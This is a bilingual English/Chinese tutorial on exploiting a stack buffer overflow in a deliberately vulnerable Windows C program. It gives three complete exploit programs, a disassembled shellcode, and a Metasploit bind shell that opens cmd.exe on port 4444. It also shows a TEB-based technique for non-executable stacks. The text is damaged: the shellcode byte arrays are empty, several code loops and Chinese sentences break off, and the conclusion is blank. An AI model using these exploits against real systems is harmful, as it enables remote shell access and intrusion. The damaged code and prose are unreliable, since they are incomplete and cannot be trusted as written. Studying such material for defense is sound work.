Windows 中的 SHELLCODE 定位與緩衝區溢出



The Shellcode Location and Buffer Overflow Under Windows

Windows 中的 SHELLCODE 定位與緩衝區溢出

原文:suN8Hclf <> & crimsoN_Loyd9 <>

翻譯:PSHuang [PSNLAB]


0x00 Introductions

0x00 介紹

This is not just another paper describing basics of buffer overflows. There are lots of publications

about this topic; therefore it does not make any sense to describe it again. If you are familiar with

exploiting buffer overflows on Windows platform, do not think that this article has nothing to offer you in

this article. It shows some interesting methods, which can be used during writing an exploit (for example:

where to put shellcode when stack is non-executable). Basic knowledge of x86 processors, Assembly and C

languages and buffer overflows exploitation are required.

這並非另一篇描述緩衝區溢出基礎的文章。 這個課題已存在眾多公開文件;因此該處沒必要老

調重彈。 假如熟悉 Windows 平台下溢出技術的人,也別認為該文對妳毫無助益。 文中將示範於撰


寫攻擊代碼(exploit)期間數種會被使用的有趣手法(例如:當堆疊不可執行代碼時,應放置 Shellcode

之處)。 至於對 x86 微處理器、組合語言、C 語言與緩衝區溢出原理的認知為最低需求。

Acquiring the ability to overflow a buffer on the stack, gives us through the obtaining full control over

the EIP register of x86 Processor. Yep!!! This is great!!! We can load this register with arbitrary address

every address we want, and then force a vulnerable program to jump there and to and execute the code

that is at that address.

透過完全掌握 x86 微處理機中的 EIP 暫存器,就有進行堆疊溢出的能力。 吔~這很棒! 我們


Theoretically, we could implement in which aforementioned. But the problem occurred when we want

to execute the code in which WE want to be executed and not the code, which we desired is doesn’t

actually exist in the memory. To achieve it, we have got to place OUR code in the memory of process we are

attacked. This code is known as shellcode and it consists of a set of instructions for processor, additionally

encoded in their hex values.


想逆轉致勝,就得把構造的代碼放入欲攻擊行程的記憶體中。 該代碼稱作 shellcode 其中包含一組


In this paper, I will discuss three possible locations in memory, where we can put our shellcode and

then, how to force the vulnerable application to execute it. During this tutorial we will be using two

shellcodes, of which are different sizes.

於該篇章中,筆者將探討三種可能放置 shellcode 的記憶體位置,然後強迫有弱點的應用程式去

執行。 於本次教學,筆者將使用兩個尺寸相異的 shellcode 程式碼。

The first one was written by me:


1. Loads user32.dll library to process memory

2. Calls MessageBoxA

3. Calls ExitProcess(0) to terminate process

1. 載入 user32.dll 到行程記憶體中

2. 呼叫 MessageBoxA

3. 呼叫 ExitProcess(0) 隨即終止行程

The second one was generated in Metasploit Framework:

It binds Windows shell (cmd.exe) to port 4444.

第二由 Metasploit Framework 自動產生:

綁定 Windows 交談介面代碼至埠口 4444(cmd.exe)。


Three methods (possible locations in memory) I will describe are the following:


1. On the stack, behind the buffer that smashes the stack (so behind the return address).

2. In buffer, this overflows buffer on the stack.

3. In TEB (Thread Environment Block) block

1. 於堆疊中,粉碎於緩衝區之後(因此面向返回位址)。

2. 於程式緩衝區中,進行堆疊溢出作業。

3. 於緒環境區塊(TEB)中,進行堆疊溢出作業。

0x01 Shellcodes


1. The first shellcode (64 bytes):

1. 第一個 shellcode 代碼(64 位元組):

char shellcode[]=






In details:


00401B7C EB 02 JMP SHORT vuln.00401B80

00401B7E EB 05 JMP SHORT vuln.00401B85

00401B80 E8 F9FFFFFF CALL vuln.00401B7E

00401B85 5B POP EBX

00401B86 33C9 XOR ECX,ECX

00401B88 83C3 35 ADD EBX,35


00401B8D 83EB 06 SUB EBX,6

00401B90 53 PUSH EBX

00401B91 B8 CF053579 MOV EAX,KERNEL32.LoadLibraryA //check

address of LoadLibraryA on your own

00401B96 FFD0 CALL EAX

00401B98 33C9 XOR ECX,ECX

00401B9A 51 PUSH ECX

00401B9B 53 PUSH EBX


00401B9C 53 PUSH EBX

00401B9D 51 PUSH ECX

00401B9E 05 11111111 ADD EAX,11111111

00401BA3 2D 79900E11 SUB EAX,110E9079

00401BA8 FFD0 CALL EAX //here, in eax

should be an address of

00401BAA 33C9 XOR ECX,ECX //MessageBoxA


00401BAC 51 PUSH ECX

00401BAD B8 1AE03479 MOV EAX,KERNEL32.ExitProcess //address of



00401BB4 75 73 JNZ SHORT vuln.00401C29

00401BB6 65:72 33 JB SHORT vuln.00401BEC

00401BB9 3261 XOR AL,BYTE PTR DS:[EAX]

Wow, I have written it under Windows 2000 Service Pack 4. If you are using another Windows platform,

you should change address of LoadLibraryA, MessageBoxA and ExitProcess in kernel32 and User32 to good

ones. As you can see, this simple code simply invokes MessageBoxA and then it terminates the process.

哇~這個代碼筆者已在 Windows 2000 SP4 下實做過。 假如使用其他 Windows 平台的人,請自

行將 LoadLibraryA、 MessageBoxA 與 ExitProcess 於 kernel32 與 user32 函數庫的位址修正為可行

的。 如妳所見,該代碼單純地呼叫 MessageBoxA 隨即終止自身行程。

2. The second shellcode(399 bytes):

2. 第二個 shellcode 代碼(399 位元組):

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444

Size=399 ]

unsigned char shellcode[] =



























0x02 Vulnerable C Program

0x02 有弱點的 C 程式

Here is a code of the vulnerable program, which we'll be attacking using three methods:

此處為一個有弱點的 C 程式,筆者將利用以下三種手法進行攻擊:


#include <stdio.h>

#include <stdlib.h>

int foo(char *);

int main(int argc, char *argv[])


if(argc != 2)

return printf("Supply an argument, dude\n");


return 0;


int foo(char *input)


unsigned char buffer[600]="";

printf("%.8X\n", &buffer);

strcpy(buffer, input);


return 0;



As you can see, there is a possibility (in foo() function) to overflow a buffer on the stack. Strcpy()

function does not check the length of "source" data.

如妳所見,於 foo() 函數的堆疊上將可能誘發區溢出攻擊。 Strcpy() 函數並未檢查「來源」資料



To make our think much simpler, let's assume that 620 bytes is the

maximum size of data that DOES NOT overwrite return address on the stack.


為了使筆者的作業更加簡易,讓此處假設 620 位元組


0x03 The First Method

0x03 手法一

This is probably the most popular and the simplest method. We fill entire buffer (620 bytes) with

"chunk", the return address we overwrite with jump(call, jmp), and then we place our shellcode. Inside the

buffer, which where exploited the vulnerable program with this method looks like it:

其為最普及且最簡易的手法。 筆者先以「填充物」塞滿整個緩衝區(620 位元組),再以跳躍指

令(call、jmp)覆寫返回位址, 最後放置構造的 shellcode。 於緩衝區內,攻擊弱點程式手法如下


[620 bytes of chunk] [jmp esp, call esp] [some NOP's] [shellcode]

We assume that ESP register points to our shellcode during overflow (shellcode is on the top of the


筆者假設 ESP 暫存器於溢出期間指向構造的 shellcode(shellcode 位於堆疊頂端)。

Here is the exploit:



#include <stdio.h>

#include <stdlib.h>


#include <windows.h>

#define RET 0x7935EDBB /* ATTENTION!!! Change it. Search kernel32.dll

or any other library for jmp esp or call esp

instruction and then save the address */

#define TRASH 0x41

char shellcode[]=






int main(int argc, char *argv[])


char *bufExe[3];

char buf[700];

int i;

char *ptr = buf;

memset(buf, 0, sizeof(buf));

bufExe[0] = "vuln.exe";

bufExe[2] = NULL;


(*ptr++) = TRASH; //620 bytes of chunk

*(unsigned long *)&buf[620] = RET; //then return address = jmp esp, call


strcat(buf, "\x90\x90\x90\x90"); //small NOP sledge

strcat(buf, shellcode); //and our first shellcode

bufExe[1] = buf;


return 0;



This method works correctly, but is very limited. Why? Because we should use short length of our

shellcode must be SMALL. If you use long shellcode(for example the second one from this paper), it will be


cut. Therefore using this method we won't force the vulnerable program to execute or second shellcode. To

do it we have got to use the second method.

該手法可正確運行卻有所限制。 原因是什麼? 因為筆者必須使用短的 shellcode。 假如有人使

用長的 shellcode(例如:該文中的第二個 shellcode)將會被截斷。 因此使用該手法,筆者將無法

強迫有弱點的程式執行所構造的代碼。 筆者必須利用手法二去達成目標。

0x04 The Second Method

0x04 手法二

To execute long shellcode we need much more place: 399 bytes + NOP sledge (in our example). If the

buffer in an application, in which we are attacked, where allocated quite big space (620 bytes in vulnerable

program), we can place THERE our shellcode and jump to the beginning of our code in buffer. This is how

most of exploits for Linux kernel < 2.6 works. Buffer looks like it:

欲執行長的 shellcode 我們需要更多空間:399 位元組 + NOP 墊腳石(於該範例中)。 假如欲

攻擊應用程式內的緩衝區,那裡配置相當大的空間(於有弱點程式中的 620 位元組),則可將構造代

碼置於此處並跳躍至其起始處執行。 其中小於 2.6 版本的 Linux Kernel 可正常運作絕大多數的攻擊

代碼。 至於緩衝區配置如下所示:

[NOP sledge] [REAL SHELLCODE] [call esp, jmp esp] [some NOP's] [MINI SHELLCODE]

As you can see, we have got to use two shellcodes:

如妳所見,以下必須使用兩個 shellcode 代碼:

REAL SHELLCODE The real shellcode which we want to be executed.

真實 SHELLCODE 攻擊程式原先要執行的 shellcode 代碼。

MINI SHELLCODE The small shellcode using second method which will jump to the REAL one.

小型 SHELLCODE 利用手法二跳躍至真實 shellcode 之處。

In our example (vulnerable program) the ECX register points to the end of buffer. Therefore we can use

it, to jump at the beginning of the buffer. We can do it by:

在範例中(有弱點的程式)ECX 暫存器指向緩衝區的結尾。 因此我們可以利用於緩衝區起始跳

躍工作。 作法如下:

dec ch

dec ch

jmp eax


NOP Sledge


Of course, you may need to change it. The most important thing is that the ECX register, must point to

the NOP sledge before, which was located among REAL SHELLCODE after the execution of and MINI

SHELLCODE, where the former one behind the latter one.


理所當然,妳可能需要作變更。 其中最重要的是 ECX 暫存器,必須指向 NOP 墊腳石之處,而

墊腳石座落於真實 SHELLCODE 與 小型 SHELLCODE 之間,其中前者背向後者(譯者註:林盃覺得原





#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#define RET 0x7935EDBB //see comments in exploit1.c

#define NOP 0x90

unsigned char shellcode[] =



























char mini[]=

"\xFE\xCD" // dec ch

"\xFE\xCD" // dec ch

"\xFF\xE1"; /* jmp ecx (the ECX register should point to the NOP

sledge before REAL shellcode) */

int main(int argc, char *argv[])


char *bufExe[3];

char buf[700];

int i;

char *ptr = buf;

memset(buf, 0, sizeof(buf));

bufExe[0] = "vuln.exe";

bufExe[2] = NULL;


(*ptr++) = NOP; //load 160 NOPs (counted value)

strcat(buf, shellcode); //load our shellcode (399 bytes)

strcat(buf, "\x90"); //load one NOP to gain rounded value 560



strcat(buf, "\x90\x90\x90\x90\x90"); //load some NOPs to be 620 bytes


*(unsigned long *)&buf[620] = RET; //now jump to MINI SHELLCODE(call esp)

strcat(buf,"\x90\x90\x90\x90"); //some NOPs

strcat(buf, mini); //MINI SHELLCODE

bufExe[1] = buf;


return 0;



Of course, all values in this example were counted, and they won't be good any time. You have got to

do the math yourself :) Ok, it works, but what if the stack is non-executable?

理所當然,本例中的數值皆先行經過計算,難免會有誤差。 妳必須自行作比對:) 好的,程式



0x05 The Third Method

0x05 手法三

If the stack memory was configured to forbid the execution of code that is placed on it, we have got to

choose another place to store our shellcode. We can, For example, we can choose TEB block, for every

block has 520 bytes buffer used during Unicode to ASCII strings conversion. This buffer is shifted (placed)

0xC00 bytes from the beginning of TEB block. The TEB block of the first process's thread has was located at

address 0x7FFDE000 so the free buffer for our shellcode is at 0x7FFDEC00 (0x7FFDE000 + 0xC00).

假如於堆疊記憶體組態中禁止執行代碼,那麼就需要選擇另外的地方保存 shellcode 代碼。 舉

例來說,可以選擇緒環境區塊(TEB),而此緩衝區佔據 520 位元組,作用於 Unicode 碼至 ASCII 碼

轉換時期。 該緩衝區從 TEB 區塊起始處偏移 0xC00 位元組。 TEB 區塊的首要行程緒的位址起始於

0x7FFDE000,因此 shellcode 代碼的儲存空間從 0x7FFDEC00(0x7FFDE000 + 0xC00)開始算起。

Because this address ends with NULL byte, we should change it to a non-null byte one (for example,

0x7FFDEC04). But here is a trap. If our exploit did use invoke any function that uses the buffer in TEB block

for conversion between Unicode and ASCII, the attacked process would probably crash down and our

shellcode would not be executed.

因為該位址以零字元(Null Byte)結尾,筆者需要轉成一個非零的(例如:0x7FFDEC04)。 但是

這裡佈置一個陷阱。 假如攻擊代碼呼叫任何位於 TEB 區塊中 Unicode 與 ASCII 之間轉換用的函數,

那麼被攻擊的目標程式大多會掛點,然後構造的 shellcode 代碼也無法順利執行。

Fortunately, there are some others free locations in TEB block that are not used. For example, starting

from 0x7FFDE1BC, there is a buffer containing only NULL bytes, where we can overwrite. So this is how our

buffer looks like, which will be sent to vulnerable program, looks like:

幸好 TEB 區塊中尚存可利用之處。 舉例來說,從 0x7FFDE1BC 開始,有一個全然以空字元構成

的緩衝區,而此處可供設計者覆寫。 因此有弱點程式於記憶體中的緩衝區分配如下:

[NOPs] [shellcode] [ NOPs] [STR_FUNC] [STR_FUNC_RET] [DEST_BUF] [SRC_BUF]



STR_FUNC 620-624 bytes The function address, which will be used to copy our NOP sledge +

shellcode to TEB block (lstrcpyA or lstrcatA).

STR_FUNC 620-624 位元組 作用於複製 NOP 墊腳石與構造的 shellcode 代碼至 TEB 區塊

中的函數位址(lstrcpA 或 lstrcatA)。


STR_FUNC_RET 624-628 bytes The return address for STR_FUNC. In our example we are jumping to

our buffer with shellcode at 0x7FFDE1BC.

STR_FUNC_RET 624-628 位元組 函數 STR_FUNC 的返回位址。 於本例中,提供 shellcode 代碼

(位於 0x7FFDE1BC)跳躍至緩衝區的用途。

DEST_BUF 628-632 bytes The address where we are copied our shellcode to. It’s the TEB block

(0x7FFDE1BC) in our case.

DEST_BUF 628-632 位元組 筆者要複製 shellcode 代碼的目的地。 於本例中,屬於 TEB 區

塊(位於 0x7FFDE1BC)。

SRC_BUF 632-636 bytes The address where we are copied our code from. We copy NOP

sledge and shellcode. Get this address from vulnerable program.

SRC_BUF 632-636 位元組 筆者要複製 shellcode 代碼的來源處。 從這裡獲得 NOP 墊腳石

與 shellcode 代碼,而此位址可由有弱點程式中得知。

And the third exploit:



#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#define TEB 0x7FFDE1BC // the location where we are copying our


#define BUF_ADDR 0x0013B870 //address of buffer from vuln.c

#define STRCPY_FUNC 0x7935DF5C //address of lstrcpyA in kernel32.dll

for Win2000

unsigned char shellcode[] =



























int main(int argc, char *argv[])


char *bufExe[3];

char buf[770];

int i,y;

bufExe[0] = "vuln.exe";

bufExe[2] = NULL;

memset(buf, 0, sizeof(buf));


strcat(buf, "\x90\x90\x90\x90"); //100 bytes of NOP

for(i=strlen(buf), y=0;y<sizeof(shellcode);y++,i++)

buf[i] = shellcode[y]; //our shellcode


strcat(buf, "\x90"); //and fill the rest of buffer with

NOP's (total 620 bytes)

*(unsigned long *)&buf[620] = STRCPY_FUNC;

*(unsigned long *)&buf[624] = TEB;

*(unsigned long *)&buf[628] = TEB;

*(unsigned long *)&buf[632] = BUF_ADDR;


bufExe[1] = buf;


return 0;



After invoking this exploit, and typed:


> netstat –a

You should see opened port -> 4444. Good...

妳應該看到埠口 4444 開啟了。 好的…

The length of our shellcode should be lesser than 520 bytes, which prevent to overflow the next TEB

or PEB block.

構造的 shellcode 長度必須小於 520 位元組,以避免造成下個 TEB 或 PEB 區塊溢出。

0x06 Conclusions

0x06 結論

0x07 Greetings

0x07 致謝

Sir P.Sobczak (for being the "coolest" person in the world, for Your help, suggestions) and

M.Domosud(for trust), P.Jeda(for friendship), K.CzErEdYs(for "jestes zajebisty"), M.Slaski, Die_Angel,0in(for

WebIDS), all DaRk-CodeRs Group, adhgmiz(for inspiration), Emmanuel Goldstein(for "drug deal":):)), rHiana,


